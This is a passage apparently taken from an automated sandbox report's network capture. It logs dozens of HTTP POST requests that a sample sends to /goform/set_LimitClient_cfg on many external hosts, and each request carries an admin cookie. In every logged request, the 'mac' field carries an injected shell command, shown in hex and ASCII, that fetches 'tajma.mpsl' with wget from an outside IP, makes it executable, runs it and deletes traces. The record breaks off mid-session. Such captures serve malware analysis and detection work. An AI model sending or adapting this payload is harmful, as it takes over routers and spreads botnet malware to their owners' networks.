                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3094192.168.2.235175096.11.126.738080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.508107901 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3095192.168.2.236072643.112.207.708080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.508110046 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3096192.168.2.2338714203.142.230.948080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.508167028 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3097192.168.2.2344640168.221.56.118080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.508186102 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3098192.168.2.2347538209.131.110.1968080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.508208036 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3099192.168.2.2348352177.183.10.798080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.508219957 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3100192.168.2.2359214132.193.252.1608080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.508400917 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3101192.168.2.2356226200.52.13.2138080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.508457899 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3102192.168.2.235877662.2.89.628080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.508480072 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3103192.168.2.233954063.193.30.118080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.508533955 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3104192.168.2.236098286.110.251.1068080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.508553028 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3105192.168.2.233791070.119.161.1748080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.508630037 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3106192.168.2.234935076.105.42.1088080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.508651018 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3107192.168.2.234903650.227.28.2508080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.508667946 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3108192.168.2.2350254154.6.129.1568080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.508770943 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3109192.168.2.233525892.27.68.1898080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.508786917 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3110192.168.2.2351944218.170.153.1808080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.508796930 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3111192.168.2.2353816206.11.74.98080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.508816957 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3112192.168.2.2348326142.178.12.1078080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.508838892 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3113192.168.2.235743476.50.92.558080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.508889914 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3114192.168.2.2344526196.25.50.868080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.508922100 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3115192.168.2.2342608221.7.220.1408080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.508922100 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3116192.168.2.2349396199.27.0.2068080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.508939981 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
